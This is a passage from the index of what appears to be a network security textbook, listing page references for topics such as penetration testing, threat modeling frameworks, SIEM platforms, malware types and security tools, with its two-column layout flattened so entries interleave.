concepts 195 configuration review 29
examination and analysis 196 design review 29
identification 195 dynamic analysis 29
industry best practices and standards 212 network infrastructure testing 30
key approaches 211 static analysis 29
network protocols 198, 199 web application testing 30
presentation 196 network security effectiveness
preservation 196 action priority matrix 30, 31
network monitoring checklist 247, 249, 251 assessing 28
Network Operations Center (NOC) threat modeling 31, 32
dashboards 27 network security
escalation 27 best practices 23
functional ticketing system 25 components 10, 11
high availability and failover 28 concepts 9
incident management 24 guidelines 23
knowledge base 25 overview 9
monitoring policy 26 network segmentation 12
overview 23 network virtual appliances (NVAs) 56
reporting 27 network vulnerability assessments
well-defined investigation process 26 about 111, 112
network penetration testing scanning tools, utilizing 112, 113
approach 123 network, for penetration testing
exploitation 125 setting up 128, 129
post-exploitation 126 network-based intrusion detection system (NIDS)
pre-engagement 124 254
reconnaissance 125 network
reporting 126 system hardening 12
retesting 127, 128 NetworkMiner 205, 206
threat modeling 125 Nexpose 113
network security architecture approach NIKSUN Suite 202, 203
about 14 Nikto 139
building phase 15, 18, 19 Nipper 239
[ 359 ]
NIST Release Special Publication 800-37 116, email phishing 80
117 smishing 81
NIST Risk Management Framework 114, 115 vishing 81
Nmap 136, 237 whaling 82
NOC audit checklist 252, 253, 255 Platform as a Service (PaaS) 41
non-disclosure agreement (NDA) 258 policy 225
non-repudiation 10 post-deployment review 14
practical pen testing phase
O architecture flaws 159
OCTAVE Allegro 36 configuration flaws 159
OCTAVE-S 36 source code vulnerabilities 159
Open Vulnerability Assessment System (OpenVas) Private Branch Exchange (PBX) 185
130 Privileged Access Management (PAM) 42, 60
Open-AudIT 236, 237 Privileged Identity Management (PIM) 53
OpenVAS 113 proactive security strategy
OWASP Zed Attack Proxy (ZAP) 182 advancing to 303
developing key considerations 303
P security challenges, evolving 304
Payment Card Industry Security Standards Council system, building steps 305, 306, 307
(PCI DSS) 64, 230 procedures 225
penetration testing, best practices Process for Attack Simulation and Threat Analysis
about 155 (PASTA)
case study 155 about 33
information gathering 156 reference link 34
presentation 158 programmable logic controllers (PLCs) 169, 175
reporting 158 Proof-of-Concept (POC) 17
servers, scanning 156 purple team 161
vulnerabilities, exploiting 157
vulnerabilities, identifying 157 R
penetration testing, for IoT networks ransomware threats
about 180 fixing 103, 104
evaluation 181 ransomware
exploitation 181 about 101
reconnaissance 180 doxware 102
reporting 181 encrypting ransomware 102
penetration testing mobile ransomware 102
platforms 128 non-encrypting ransomware 102
report, reference link 126 red team 160, 161
Personally Identifiable Information (PII) 79 REMnux
phishing threats URL 289
fixing 82, 83 resident virus 90
signs 82 resilience 10
phishing reverse engineering 185
about 79, 82 reverse engineering firmware
domain spoofing 81 penetration testing 176
[ 360 ]
risks non-intrusive 124
managing 279 SIEM platforms
rogue applications about 334
about 83 AlienVault OSSIM 340, 341, 342
fixing 84, 85 ArcSight Enterprise Security Manager (ESM)
role-based access control (RBAC) 50 335, 336, 337
rootkit threats Elasticsearch, Logstash, and Kibana (ELK) 338,
fixing 97 339
rootkit IBM QRadar 337, 338
about 96 Splunk 334, 335
bootloader rootkits 97 single sign-on (SSO) 52
hardware or firmware rootkits 97 sinkholes 94
kernel rootkits 96 Smokescreen IllusionBLACK Deception 328
memory rootkits 96 smominru botnet 93
user-mode rootkits 96 SMS phishing 81
soft targets 14
S Software as a Service (SaaS) 41
sample penetration test report, Offensive Security software threats
reference link 126 fixing 84, 85
Sarbanes-Oxley (SOX) Act 229 Software-Defined Networking (SDN) 12
secure cloud computing software-defined radio attacks
about 41, 42 about 70
AWS' Shared Responsibility Model 43 cryptanalysis attacks 71
cybersecurity challenges with 43, 44, 45 mitigation techniques 72
Secure Real-Time Protocol (SRTP) 189 reconnaissance attacks 72
security assessment tools replay attacks 71
about 238 types 70
Nessus 238, 239 SolarWinds 235
Nipper 239, 240 SolarWinds Network Automation Manager 259
Wireshark 240 SolarWinds Network Configuration Manager 260,
261
security assessment
Solera Networks DS 208
approaches 68, 70
Spacefiller virus 90
Security Information and Event Management
Sparta 131
(SIEM)
Splunk
about 331, 332
about 334, 335
capabilities 332, 334
advantages 334
platforms 334
standards 225
security leadership concerns
stealth 90
addressing 294, 295
Storage Service Encryption (SSE) 55
risk and threat management, conveying 295,
296 STRIDE
Security Onion 203, 204 about 33
Security Operations Center (SOC) 23 reference link 33
security tests Stuxnet 169
intrusive 124 Stuxnet attack
[ 361 ]
reference link 169 about 33
supervisory control and data acquisition (SCADA) OCTAVE 35
169 PASTA 33
supply chain attacks 106 STRIDE 33
Trike 34
T VAST 35
tabletop forensics exercise threats, VoIP
conducting 215 Denial of Service (DoS) 188
tactics, techniques, and procedures (TTPs) 170, eavesdropping 189
277 vishing 188
teaming threats
about 160 managing 279
blue team 161 monitoring 107, 108
purple team 161 Tigerbot 92
red team 161 tools, advanced testing
Temporal Key Integrity Protocol (TKIP ) 64 AttackIQ 183
third-party attacks 106 CALDERA 183
threat hunting, platforms Foreseeti 183
cybereason 322, 323 Infection Monkey 183
endgame platform 321, 322 NeSSi2 183
MITRE ATT&CK 320 Transparent Data Encryption (TDE) 55
threat hunting TrapX Security 330, 331
components 317 Trike 34
maturity model 319, 320 Trojan Horse 94
plan, developing 317, 318, 319 trojan threats
platforms 320 fixing 96
stages 316 Trojan-Banker 95
working with 315 trojan-DDoS 95
threat intelligence, platforms Trojan-Downloader 95
Digital Shadows SearchLight 314, 315 Trojan-Mailfinder 95
FireEye iSIGHT 310, 311 Trojan-Spy 95
IBM's X-Force Exchange 311, 312 trojans 94
IntSight's Enterprise Threat Intelligence 312, TrueSight Network Automation 262
313, 314 typosquatting 81
Mitigation Platform 312, 313, 314
threat intelligence U
functions 308 UART communication
key aspects 307 reference link 183
key attributes 309 unified threat management (UTM)
platforms 310 about 280, 281
working with 307, 308, 309, 310 advantages 280
threat management solution, deploying 281
best practices 293, 294 Universal Asynchronous Receiver/Transmitter
threat modeling 31, 32 (UART) 183
threats, assessing Universal Radio Hacker (URH) 71
[ 362 ]
User and Entity Behavior Analytics (UBEA) 49 report 111
verify 111
V
virus 89 W
viruses threat web application firewall (WAF) 56
fixing 91 white-box testing 162
vishing 188 Wi-Fi attack
Visual, agile, and simple threat modeling (VAST) exploitation techniques 62
35 surface analysis 62
Voice over Internet Protocol (VoIP) Wi-Fi data
about 185 collection and analysis 63, 64
cons 187 Wireless Intrusion Prevention System (WIPS) 64
countermeasures and defense vectors 189 wireless network security
pros 187 about 62
VoIP monitoring and security best practices 65, 66, 67, 68
top platforms 190 exploitation techniques 62, 64, 65
VoIP phone classifications Wi-Fi attack 64, 65
equipment-based 186 Wi-Fi attack surface analysis 62
programming-based 186 Wi-Fi data, collection and analysis 63, 64
VoIP security issues Wireshark 201, 202, 240
analyzing 187, 188 worm 89
VoIP threat landscape 185 worm treat
vulnerabilities fixing 91
monitoring 107, 108
vulnerability and patch management X
about 292 Xplico 205
benefits 292
vulnerability management lifecycle
about 110
Z
Zero Trust model 51
assets, prioritizing 110
zeus 93
discovery 110
Zimmermann Real-Time Transport Protocol
remediate 111
(ZRPTP) 189